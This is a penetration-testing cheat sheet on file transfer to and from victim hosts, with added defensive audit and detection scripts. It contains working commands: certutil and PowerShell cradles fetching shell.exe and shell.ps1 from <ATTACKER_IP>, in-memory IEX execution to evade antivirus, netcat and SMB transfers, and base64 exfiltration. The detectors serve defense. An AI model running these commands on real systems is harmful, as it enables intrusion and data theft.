File transfer
During a pentest, you will find interesting files that you may want to download for later analysis, or you may want to upload your own tools to carry out further attacks. However, you will not always have the means to transfer files on a restricted computer. Hence, in this section you will see several methods to transfer files, depending on the victim's OS.
If you do not have write permissions to upload files on the victim's system, there are some directories on Linux that normally allow everyone to write files to them:
/tmp/
/dev/shm/
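Both directories above are writable by everyone, so the first thing a defender wants to know is whether files dropped there can also be executed. The following script is an added example, not part of the original page: it checks a list of directories for world-writability, the sticky bit and the noexec mount option, and parses /proc/mounts-format text so it also runs against a constructed sample offline. The sample mount table, the audited paths and the "risky" rule (world-writable and not noexec) are this example's own assumptions.

```python
"""Audit world-writable directories (added example, not from the original page).

For each directory, report whether it is world-writable, whether the sticky bit is
set (users cannot delete each other's files) and whether the mount it lives on has
the 'noexec' option, which stops binaries dropped there from being executed.
"""
import os
import stat

# Constructed sample in /proc/mounts format; not captured from a real host.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime,size=1048576k 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,inode64 0 0
"""


def parse_mounts(text):
    """Map mount point -> set of mount options from /proc/mounts-style text."""
    mounts = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        # /proc/mounts escapes spaces in paths as the octal sequence \040
        mount_point = fields[1].replace("\\040", " ")
        mounts[mount_point] = set(fields[3].split(","))
    return mounts


def mount_options_for(path, mounts):
    """Return the options of the longest mount point that is a prefix of path."""
    path = os.path.abspath(path)
    best = "/"
    for mp in mounts:
        if mp == "/" or path == mp or path.startswith(mp.rstrip("/") + "/"):
            if len(mp) > len(best):
                best = mp
    return mounts.get(best, set())


def classify_mode(mode):
    """Extract the two permission facts we care about from a directory's st_mode."""
    return {
        "world_writable": bool(mode & stat.S_IWOTH),
        "sticky": bool(mode & stat.S_ISVTX),
    }


def audit_dir(path, mounts):
    """Audit one directory; returns None if it does not exist or is not a directory."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    if not stat.S_ISDIR(st.st_mode):
        return None
    facts = classify_mode(st.st_mode)
    facts["path"] = path
    facts["noexec"] = "noexec" in mount_options_for(path, mounts)
    # Assumed rule: a world-writable directory that is not noexec is a
    # convenient staging point for dropped tools, so flag it.
    facts["risky"] = facts["world_writable"] and not facts["noexec"]
    return facts


def audit(paths, mounts):
    """Audit several directories, skipping the ones that do not exist."""
    return [r for r in (audit_dir(p, mounts) for p in paths) if r is not None]


if __name__ == "__main__":
    try:
        with open("/proc/mounts") as fh:  # live mount table on Linux
            table = parse_mounts(fh.read())
    except OSError:
        table = parse_mounts(SAMPLE_MOUNTS)  # fall back to the constructed sample
    for result in audit(["/tmp", "/dev/shm", "/var/tmp"], table):
        flag = "RISKY" if result["risky"] else "ok"
        print(f"{result['path']}: world_writable={result['world_writable']} "
              f"sticky={result['sticky']} noexec={result['noexec']} -> {flag}")
```

Run it on a Linux host to see which of the usual staging directories would let a dropped binary execute; mounting /tmp and /dev/shm with noexec (and nosuid, nodev) removes the simplest use of them without breaking their purpose.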
# On the receiving side, listen for the file to be transferred
nc -nlvp 4444 > file
# On the sending side, transfer the file (-w 3 closes the connection after 3 s of idle time)
nc -w 3 <DST_IP> 4444 < file
# netcat does not verify integrity: compare a hash of the file on both ends afterwards
# Download a file (or a directory with -r) from the remote host
scp [-r] <USER>@<IP>:<SRC_PATH> <DST_PATH>
# Upload a file to the remote host
scp <SRC_PATH> <USER>@<IP>:<DST_PATH>
Compress the file to get a smaller base64 output. Then base64-encode the compressed archive and copy the output to your clipboard.
# -e prompts for a password to encrypt the archive, -r recurses into the directory
zip -e -r exfil.zip dir_name
base64 exfil.zip > exfil.txt
Paste the output into a file on the other side, decode it, and finally uncompress the archive.
base64 -d exfil.txt > exfil.zip
unzip exfil.zip
On Windows, the following directories are normally writable by everyone:
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\System32\spool\drivers\color\ # Also allows bypassing AppLocker
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
With certutil, you can download files onto the victim's machine. Bear in mind, however, that the file is written to disk and will be scanned by any installed AV.
# -urlcache -split -f: fetch the URL and save its content to the given local file name
certutil.exe -split -urlcache -f http://<IP>/file.exe f.ex
With PowerShell, you can download files to disk.
powershell.exe Invoke-WebRequest -Uri "http://<ATTACKER_IP>/shell.exe" -OutFile notashell.exe
For PowerShell scripts, instead of writing them to disk you can load them directly into memory, which bypasses some AVs.
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/shell.ps1')"
With impacket you can set up your own SMB server to upload files to, and download files from, the victim's computer.
# Kali (attacker): share the current directory under the name "a"
smbserver.py -smb2support a .
# Victim: run the binary straight from the share, or copy it locally first
\\IP\a\nc.exe
copy \\IP\a\nc.exe .
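Each of the Windows techniques above leaves a distinctive process-creation command line, which is what an endpoint sensor or SIEM rule keys on. The following detector is an added example and not code from the original page: it runs a few regex rules over constructed Sysmon-style "Image | CommandLine | ParentImage" records (the record format, the 203.0.113.10 address and the file names are all constructed for this example) and reports which technique each event matches. The benign certutil -hashfile and Get-ChildItem records show that the rules do not fire on ordinary use of the same binaries.

```python
"""Flag process-creation events matching the download techniques on this page.

Added example, not from the original page. The events are constructed
"Image | CommandLine | ParentImage" records, not real telemetry; the rules
cover certutil -urlcache, PowerShell download cradles, in-memory execution
with IEX, and running or copying a binary from an SMB share (UNC path).
"""
import re

# Constructed sample events (203.0.113.10 is a documentation address).
SAMPLE_EVENTS = [
    r"C:\Windows\System32\certutil.exe | certutil.exe -split -urlcache -f http://203.0.113.10/file.exe f.ex | C:\Windows\System32\cmd.exe",
    r"C:\Windows\System32\certutil.exe | certutil -hashfile C:\Users\Public\a.zip SHA256 | C:\Windows\System32\cmd.exe",
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe Invoke-WebRequest -Uri "http://203.0.113.10/shell.exe" -OutFile notashell.exe | C:\Windows\System32\cmd.exe',
    r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://203.0.113.10/shell.ps1')" | C:\Windows\System32\cmd.exe""",
    r"\\203.0.113.10\a\nc.exe | \\203.0.113.10\a\nc.exe | C:\Windows\System32\cmd.exe",
    r"C:\Windows\System32\cmd.exe | cmd.exe /c copy \\203.0.113.10\a\nc.exe . | C:\Windows\explorer.exe",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe Get-ChildItem C:\Users\Public | C:\Windows\explorer.exe",
]

# Rules applied to the CommandLine field. Rule names are this example's own.
CMDLINE_RULES = [
    ("certutil_urlcache",
     re.compile(r"certutil(\.exe)?\b.*-urlcache", re.I)),
    ("powershell_download_cradle",
     re.compile(r"powershell(\.exe)?\b.*(Invoke-WebRequest|DownloadString|DownloadFile|Net\.WebClient)", re.I)),
    ("powershell_iex",
     re.compile(r"powershell(\.exe)?\b.*\b(IEX|Invoke-Expression)\b", re.I)),
    ("copy_from_unc",
     re.compile(r"\b(?:x|robo)?copy\b.*\\\\[^\\]+\\", re.I)),
]

# Applied to the Image field: the process binary itself lives on a UNC share.
UNC_PATH = re.compile(r'^"?\\\\[^\\]+\\[^\\]+\\')


def parse_event(line):
    """Split a constructed 'Image | CommandLine | ParentImage' record into a dict."""
    image, cmdline, parent = (f.strip() for f in line.split("|", 2))
    return {"Image": image, "CommandLine": cmdline, "ParentImage": parent}


def match_event(event):
    """Return the list of rule names that fire for one parsed event."""
    hits = [name for name, rx in CMDLINE_RULES if rx.search(event["CommandLine"])]
    if UNC_PATH.match(event["Image"]):
        hits.append("exec_from_unc_share")
    return hits


def detect(lines):
    """Parse each record and return (Image, [rule names]) for the ones that fire."""
    findings = []
    for line in lines:
        event = parse_event(line)
        hits = match_event(event)
        if hits:
            findings.append((event["Image"], hits))
    return findings


if __name__ == "__main__":
    for image, hits in detect(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(hits)}")
```

The rules key on the command-line tokens the techniques cannot avoid (the -urlcache switch, the WebClient and Invoke-WebRequest names, a UNC image path), which is why the benign certutil and PowerShell records stay silent; in production the same logic belongs in a Sysmon Event ID 1 or EDR process-creation query, with the parent image used to distinguish scripted use from an administrator's console.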